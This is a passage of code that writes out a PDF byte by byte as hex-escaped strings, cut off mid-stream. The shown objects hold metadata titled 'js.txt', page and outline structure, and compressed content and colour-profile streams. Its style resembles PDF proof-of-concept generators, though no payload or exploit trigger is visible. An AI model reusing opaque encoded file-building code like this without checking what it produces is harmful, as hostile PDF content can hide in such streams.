x63\x61\x74\x69\x6f\x6e\x2f\x70\x64\x66\x3c\x2f\x64\x63\x3a\x66\x6f\x72\x6d\x61\x74\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x74\x69\x74\x6c\x65\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x72\x64\x66\x3a\x41\x6c\x74\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x72\x64\x66\x3a\x6c\x69\x20\x78\x6d\x6c\x3a\x6c\x61\x6e\x67\x3d\x22\x78\x2d\x64\x65\x66\x61\x75\x6c\x74\x22\x3e\x6a\x73\x2e\x74\x78\x74\x3c\x2f\x72\x64\x66\x3a\x6c\x69\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x2f\x72\x64\x66\x3a\x41\x6c\x74\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x2f\x64\x63\x3a\x74\x69\x74\x6c\x65\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x78\x6d\x70\x4d\x4d\x3a\x44\x6f\x63\x75\x6d\x65\x6e\x74\x49\x44\x3e\x75\x75\x69\x64\x3a\x39\x64\x38\x35\x36\x39\x65\x65\x2d\x37\x66\x64\x38\x2d\x34\x34\x62\x61\x2d\x39\x63\x38\x63\x2d\x36\x65\x35\x32\x32\x35\x33\x35\x39\x62\x61\x35\x3c\x2f\x78\x6d\x70\x4d\x4d\x3a\x44\x6f\x63\x75\x6d\x65\x6e\x74\x49\x44\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x78\x6d\x70\x4d\x4d\x3a\x49\x6e\x73\x74\x61\x6e\x63\x65\x49\x44\x3e\x75\x75\x69\x64\x3a\x34\x63\x37\x30\x34\x36\x62\x34\x2d\x30\x34\x39\x33\x2d\x39\x30\x34\x62\x2d\x61\x35\x35\x32\x2d\x64\x63\x31\x37\x38\x32\x63\x62\x33\x62\x62\x31\x3c\x2f\x78\x6d\x70\x4d\x4d\x3a\x49\x6e\x73\x74\x61\x6e\x63\x65\x49\x44\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x70\x64\x66\x3a\x50\x72\x6f\x64\x75\x63\x65\x72\x3e\x41\x63\x72\x6f\x62\x61\x74\x20\x57\x65\x62\x20\x43\x61\x70\x74\x75\x72\x65\x20\x31\x31\x2e\x30\x3c\x2f\x70\x64\x66\x3a\x50\x72\x6f\x64\x75\x63\x65\x72\x3e\xd\x20\x20\x20\x20\x20\x20\x3c\x2f\x72\x64\x66\x3a\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\xd\x20\x20\x20\x3c\x2f\x72\x64\x66\x3a\x52\x44\x46\x3e\xd\x3c\x2f\x78\x3a\x78\x6d\x70\x6d\x65\x74\x61\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x3c\x3f\x78\x70\x61\x63\x6b\x65\x74\x20\x65\x6e\x64\x3d\x22\x77\x22\x3f\x3e\xd\x65\x6e\x64\x73\x74\x72\x65\x61\x6d\xd") - add_object(32, "\xd\x3c\x3c\x2f\x49\x44\x53\x20\x31\x37\x20\x30\x20\x52\x2f\x55\x52\x4c\x53\x20\x31\x38\x20\x30\x20\x52\x3e\x3e\xd") - add_object(7, "\xd\x3c\x3c\x2f\x43\x6f\x75\x6e\x74\x20\x32\x2f\x46\x69\x72\x73\x74\x20\x38\x20\x30\x20\x52\x2f\x4c\x61\x73\x74\x20\x38\x20\x30\x20\x52\x2f\x54\x79\x70\x65\x2f\x4f\x75\x74\x6c\x69\x6e\x65\x73\x3e\x3e\xd") - add_object(16, "\xd\x3c\x3c\x2f\x43\x6f\x75\x6e\x74\x20\x31\x2f\x4b\x69\x64\x73\x5b\x32\x36\x20\x30\x20\x52\x5d\x2f\x54\x79\x70\x65\x2f\x50\x61\x67\x65\x73\x3e\x3e\xd") - add_object(22, "\xd\x3c\x3c\x2f\x56\x20\x31\x2e\x32\x35\x3e\x3e\xd") - add_object(10, "\xd\x3c\x3c\x2f\x43\x6c\x61\x73\x73\x4d\x61\x70\x20\x31\x31\x20\x30\x20\x52\x2f\x4b\x20\x31\x32\x20\x30\x20\x52\x2f\x50\x61\x72\x65\x6e\x74\x54\x72\x65\x65\x20\x31\x33\x20\x30\x20\x52\x2f\x50\x61\x72\x65\x6e\x74\x54\x72\x65\x65\x4e\x65\x78\x74\x4b\x65\x79\x20\x31\x2f\x54\x79\x70\x65\x2f\x53\x74\x72\x75\x63\x74\x54\x72\x65\x65\x52\x6f\x6f\x74\x3e\x3e\xd") - add_object(11, "\xd\x3c\x3c\x2f\x53\x70\x64\x72\x41\x72\x74\x3c\x3c\x2f\x4f\x2f\x57\x65\x62\x43\x61\x70\x74\x75\x72\x65\x3e\x3e\x3e\x3e\xd") - add_object(12, "\xd\x3c\x3c\x2f\x4b\x20\x31\x35\x20\x30\x20\x52\x2f\x50\x20\x31\x30\x20\x30\x20\x52\x2f\x53\x2f\x44\x6f\x63\x75\x6d\x65\x6e\x74\x3e\x3e\xd") - add_object(13, "\xd\x3c\x3c\x2f\x4e\x75\x6d\x73\x5b\x30\x20\x31\x34\x20\x30\x20\x52\x5d\x3e\x3e\xd") - add_object(14, "\xd\x5b\x31\x35\x20\x30\x20\x52\x20\x31\x35\x20\x30\x20\x52\x5d\xd") - add_object(15, "\xd\x3c\x3c\x2f\x43\x2f\x53\x70\x64\x72\x41\x72\x74\x2f\x4b\x5b\x30\x20\x31\x5d\x2f\x50\x20\x31\x32\x20\x30\x20\x52\x2f\x50\x67\x20\x32\x36\x20\x30\x20\x52\x2f\x53\x2f\x41\x72\x74\x69\x63\x6c\x65\x3e\x3e\xd") - add_object(26, "\xd\x3c\x3c\x2f\x41\x6e\x6e\x6f\x74\x73\x20\x34\x31\x20\x30\x20\x52\x2f\x43\x6f\x6e\x74\x65\x6e\x74\x73\x20\x35\x34\x20\x30\x20\x52\x2f\x43\x72\x6f\x70\x42\x6f\x78\x5b\x30\x2e\x30\x20\x30\x2e\x30\x20\x36\x31\x32\x2e\x30\x20\x37\x39\x32\x2e\x30\x5d\x2f\x47\x72\x6f\x75\x70\x20\x33\x34\x20\x30\x20\x52\x2f\x49\x44\x20\x33\x35\x20\x30\x20\x52\x2f\x4d\x65\x64\x69\x61\x42\x6f\x78\x5b\x30\x2e\x30\x20\x30\x2e\x30\x20\x36\x31\x32\x2e\x30\x20\x37\x39\x32\x2e\x30\x5d\x2f\x50\x5a\x20\x31\x2e\x30\x2f\x50\x61\x72\x65\x6e\x74\x20\x31\x36\x20\x30\x20\x52\x2f\x52\x65\x73\x6f\x75\x72\x63\x65\x73\x3c\x3c\x2f\x43\x6f\x6c\x6f\x72\x53\x70\x61\x63\x65\x3c\x3c\x2f\x43\x53\x30\x20\x33\x33\x20\x30\x20\x52\x3e\x3e\x3e\x3e\x2f\x52\x6f\x74\x61\x74\x65\x20\x30\x2f\x53\x74\x72\x75\x63\x74\x50\x61\x72\x65\x6e\x74\x73\x20\x30\x2f\x54\x79\x70\x65\x2f\x50\x61\x67\x65\x3e\x3e\xd") - add_object(41, "\xd\x5b\x33\x38\x20\x30\x20\x52\x5d\xd") - add_object(54, "\xd\x3c\x3c\x2f\x46\x69\x6c\x74\x65\x72\x2f\x46\x6c\x61\x74\x65\x44\x65\x63\x6f\x64\x65\x2f\x4c\x65\x6e\x67\x74\x68\x20\x31\x35\x34\x3e\x3e\x73\x74\x72\x65\x61\x6d\xd\x48\x89\x5c\x4e\xc1\xd\xc2\x30\x14\xbb\xf7\x2b\xf2\x5\xbe\x56\xad\x63\x30\x6\xeb\xa6\xe0\x61\x20\xcc\xdb\xf0\x50\x6b\xa7\x3\x5d\x65\x7b\x82\xfe\xbd\x9b\xb7\x79\x48\x42\x12\x8\xa1\xac\xe7\xb6\xb1\x8e\x91\x24\x94\x31\x5b\x77\xf3\x17\xd4\x64\x2\x73\x78\xe0\x44\xc6\x84\x37\x6a\xd\xd\x25\x47\xac\xc7\xa8\x7a\x9d\xf9\xf3\xf4\xa0\x5d\x8\xec\x7b\xd0\xf1\xe7\xe\xf6\xda\x76\x96\xdb\xd0\x21\x4d\x4d\x91\x43\x6c\xcb\x91\x28\xaf\x24\xdc\x0\x5\xc\xae\x13\x4a\x62\xb5\x81\x8e\xd5\x22\xd2\x88\x96\xf1\x24\xbd\x17\x8d\xa0\xe9\x89\xbb\xfb\xe9\x48\x99\xef\xb\xc8\xf9\xcc\x7f\xad\x66\xf5\x57\x80\x1\x0\xcb\xa4\x36\x2c\xd\x65\x6e\x64\x73\x74\x72\x65\x61\x6d\xd") - add_object(34, "\xd\x3c\x3c\x2f\x43\x53\x20\x33\x36\x20\x30\x20\x52\x2f\x53\x2f\x54\x72\x61\x6e\x73\x70\x61\x72\x65\x6e\x63\x79\x3e\x3e\xd") - add_object(35, "\xd\x28\x1a\xca\x20\x4e\x2a\x5\x7b\x3\x0\xdd\xff\x1e\x62\x76\x26\xb3\x29\xd") - add_object(33, "\xd\x5b\x2f\x49\x43\x43\x42\x61\x73\x65\x64\x20\x32\x39\x20\x30\x20\x52\x5d\xd") - add_object(29, "\xd\x3c\x3c\x2f\x46\x69\x6c\x74\x65\x72\x2f\x46\x6c\x61\x74\x65\x44\x65\x63\x6f\x64\x65\x2f\x4c\x65\x6e\x67\x74\x68\x20\x32\x31\x36\x2f\x4e\x20\x31\x3e\x3e\x73\x74\x72\x65\x61\x6d\xd\x48\x89\x62\x60\x60\x9c\xe1\xe8\xe2\xe4\xca\x24\xc0\xc0\x90\x9b\x57\x52\xe4\x1e\xe4\x18\x19\x11\x19\xa5\xc0\x7e\x9e\x81\x8d\x81\x99\x1\xc\x12\x93\x8b\xb\x1c\x3\x2\x7c\x40\xec\xbc\xfc\xbc\x54\x6\xc\xf0\xed\x1a\x3\x23\x88\xbe\xac\xb\x32\xb\x53\x1e\x2f\x60\x4d\x2e\x28\x2a\x1\xd2\x7\x80\xd8\x28\x25\xb5\x38\x19\x48\x7f\x1\xe2\xcc\xf2\x92\x2\xa0\x38\x63\x2\x90\x2d\x92\x94\xd\x66\x83\xd4\x89\x64\x87\x4\x39\x3\xd9\x1d\x40\x36\x5f\x49\x6a\x5\x48\x8c\xc1\x39\xbf\xa0\xb2\x28\x33\x3d\xa3\x44\xc1\xd0\xd2\xd2\x52\xc1\x31\x25\x3f\x29\x55\x21\xb8\xb2\xb8\x24\x35\xb7\x58\xc1\x33\x2f\x39\xbf\xa8\x20\xbf\x28\xb1\x24\x35\x5\xa8\x16\x6a\x7\x8\xf0\xbb\x17\x25\x56\x2a\xb8\x27\xe6\xe6\x26\x2a\x18\xe9\x19\x91\xe8\x72\x22\x0\x28\x2c\x21\xac\xcf\x21\xe0\x30\x62\x14\x3b\x8f\x10\x43\x80\xe4\xd2\xa2\x32\x28\x93\x91\xc9\x98\x81\x1\x20\xc0\x0\x49\xc6\x38\x2f\xd\x65\x6e\x64\x73\x74\x72\x65\x61\x6d\xd") - add_object(36, "\xd\x5b\x2f\x49\x43\x43\x42\x61\x73\x65\x64\x20\x33\x30\x20\x30\x20\x52\x5d\xd") - add_object(30, "\xd\x3c\x3c\x2f\x41\x6c\x74\x65\x72\x6e\x61\x74\x65\x2f\x44\x65\x76\x69\x63\x65\x52\x47\x42\x2f\x46\x69\x6c\x74\x65\x72\x2f\x46\x6c\x61\x74\x65\x44\x65\x63\x6f\x64\x65\x2f\x4c\x65\x6e\x67\x74\x68\x20\x32\x35\x37\x34\x2f\x4e\x20\x33\x3e\x3e\x73\x74\x72\x65\x61\x6d\xd\x48\x89\x9c\x96\x79\x54\x53\x77\x16\xc7\x7f\x6f\xc9\x9e\x90\x95\xb0\xc3\x63\xd\x5b\x80\xb0\x6\x90\x35\x6c\x61\x91\x1d\x4\x51\x8\x49\x8\x1\x12\x42\x48\xd8\x5\x41\x44\x5\x14\x45\x44\x84\xaa\x95\x32\xd6\x6d\x74\x46\x4f\x45\x9d\x2e\xae\x63\xad\xe\xd6\x7d\xea\xd2\x3\xf5\x30\xea\xe8\x38\xb4\x16\xd7\x8e\x9d\x17\x38\x47\x9d\x4e\x67\xa6\xd3\xef\x1f\xef\xf7\x39\xf7\x77\xef\xef\xdd\xdf\xbd\xf7\x9d\xf3\x0\xa0\x27\xa5\xaa\xb5\xd5\x30\xb\x0\x8d\xd6\xa0\xcf\x4a\x8c\xc5\x16\x15\x14\x62\xa4\x9\x0\x3\xd\x20\x2\x11\x0\x32\x79\xad\x2e\x2d\x3b\x21\x7\xe0\x92\xc6\x4b\xb0\x5a\xdc\x9\xfc\x8b\x9e\x5e\x7\x90\x69\xbd\x22\x4c\xca\xc0\x30\xf0\xff\x89\x2d\xd7\xe9\xd\x0\x40\x19\x38\x7\x28\x94\xb5\x72\x9c\x3b\x71\xae\xaa\x37\xe8\x4c\xf6\x19\x9c\x79\xa5\x95\x26\x86\x51\x13\xeb\xf1\x4\x71\xb6\x34\xb1\x6a\x9e\xbd\xe7\x7c\xe6\x39\xda\xc4\xd\x8d\x56\x81\xb3\x29\x67\x9d\x42\xa3\x30\xf1\x69\x9c\x57\xd7\x19\x95\x38\x23\xa9\x38\x77\xd5\xa9\x95\xf5\x38\x5f\xc5\xd9\xa5\xca\xa8\x51\xe3\xfc\xdc\x14\xab\x51\xca\x6a\x1\x40\xe9\x26\xbb\x41\x29\x2f\xc7\xd9\xf\x67\xba\x3e\x27\x4b\x82\xf3\x2\x0\xc8\x74\xd5\x3b\x5c\xfa\xe\x1b\x94\xd\x6\xd3\xa5\x24\xd5\xba\x46\xbd\x5a\x55\x6e\xc0\xdc\xe5\x1e\x98\x28\x34\x54\x8c\x25\x29\xeb\xab\x94\x6\x83\x30\x43\x26\xaf\x94\xe9\x15\x98\xa4\x5a\xa3\x93\x69\x1b\x1\x98\xbf\xf3\x9c\x38\xa6\xda\x62\x78\x91\x83\x45\xa1\xc1\xc1\x42\x7f\x1f\xd1\x3b\x85\xfa\xaf\x9b\xbf\x50\xa6\xde\xce\xd3\x93\xcc\xb9\x9e\x41\xfc\xb\x6f\x6d\x3f\xe7\x57\x3d\xd\x80\x78\x16\xaf\xcd\xfa\xb7\xb6\xd2\x2d\x0\x8c\xaf\x4\xc0\xf2\xe6\x5b\x9b\xcb\xfb\x0\x30\xf1\xbe\x1d\xbe\xf8\xce\x7d\xf8\xa6\x79\x29\x37\x18\x74\x61\xbe\xbe\xf5\xf5\xf5\x3e\x6a\xa5\xdc\xc7\x54\xd0\x37\xfa\x9f\xe\xbf\x40\xef\xbc\xcf\xc7\x74\xdc\x9b\xf2\x60\x71\xca\x32\x99\xb1\xca\x80\x99\xea\x26\xaf\xae\xaa\x36\xea\xb1\x5a\x9d\x4c\xae\xc4\x84\x3f\x1d\xe2\x5f\x1d\xf8\xf3\x79\x78\x67\x29\xcb\x94\x7a\xa5\x16\x8f\xc8\xc3\xa7\x4c\xad\x55\xe1\xed\xd6\x2a\xd4\x6\x75\xb5\x16\x53\x6b\xff\x53\x13\x7f\x65\xd8\x4f\x34\x3f\xd7\xb8\xb8\x63\xaf\x1\xaf\xd8\x7\xb0\x2e\xf2\x0\xf2\xb7\xb\x0\xe5\xd2\x0\x52\xb4\xd\xdf\x81\xde\xf4\x2d\x95\x92\x7\x32\xf0\x35\xdf\xe1\xde\xfc\xdc\xcf\x9\xfa\xf7\x53\xe1\x3e\xd3\xa3\x56\xad\x9a\x8b\x93\x64\xe5\x60\x72\xa3\xbe\x6e\x7e\xcf\xf4\x59\x2\x2\xa0\x2\x26\xe0\x1\x2b\x60\xf\x9c\x81\x3b\x10\x2\x7f\x10\x2\xc2\x41\x34\x88\x7\xc9\x20\x1d\xe4\x80\x2\xb0\x14\xc8\x41\x39\xd0\x0\x3d\xa8\x7\x2d\xa0\x1d\x74\x81\x1e\xb0\x1e\x6c\x2\xc3\x60\x3b\x18\x3\xbb\xc1\x7e\x70\x10\x8c\x83\x8f\xc1\x9\xf0\x47\x70\x1e\x7c\x9\xae\x81\x5b\x60\x12\x4c\x83\x87\x60\x6\x3c\x5\xaf\x20\x8\x22\x41\xc\x88\xb\x59\x41\xe\x90\x2b\xe4\x5\xf9\x43\x62\x28\x12\x8a\x87\x52\xa1\x2c\xa8\x0\x2a\x81\x54\x90\x16\x32\x42\x2d\xd0\xd\xa8\x7\xea\x87\x86\xa1\x1d\xd0\x6e\xe8\xf7\xd0\x51\xe8\x4\x74\xe\xba\x4\x7d\x5\x4d\x41\xf\xa0\xef\xa0\x97\x30\x2\xd3\x61\x1e\x6c\x7\xbb\xc1\xbe\xb0\x18\x8e\x81\x53\xe0\x1c\x78\x9\xac\x82\x6b\xe0\x26\xb8\x13\x5e\x7\xf\xc1\xa3\xf0\x3e\xf8\x30\x7c\x2\x3e\xf\x5f\x83\x27\xe1\x87\xf0\x2c\x2\x10\x1a\xc2\x47\x1c\x11\x21\x22\x46\x24\x48\x3a\x52\x88\x94\x21\x7a\xa4\x15\xe9\x46\x6\x91\x51\x64\x3f\x72\xc\x39\x8b\x5c\x41\x26\x91\x47\xc8\xb\x94\x88\x72\x51\xc\x15\xa2\xe1\x68\x12\x9a\x8b\xca\xd1\x1a\xb4\x15\xed\x45\x87\xd1\x5d\xe8\x61\xf4\x34\x7a\x5\x9d\x42\x67\xd0\xd7\x4\x6\xc1\x96\xe0\x45\x8\x23\x48\x9\x8b\x8\x2a\x42\x3d\xa1\x8b\x30\x48\xd8\x49\xf8\x88\x70\x8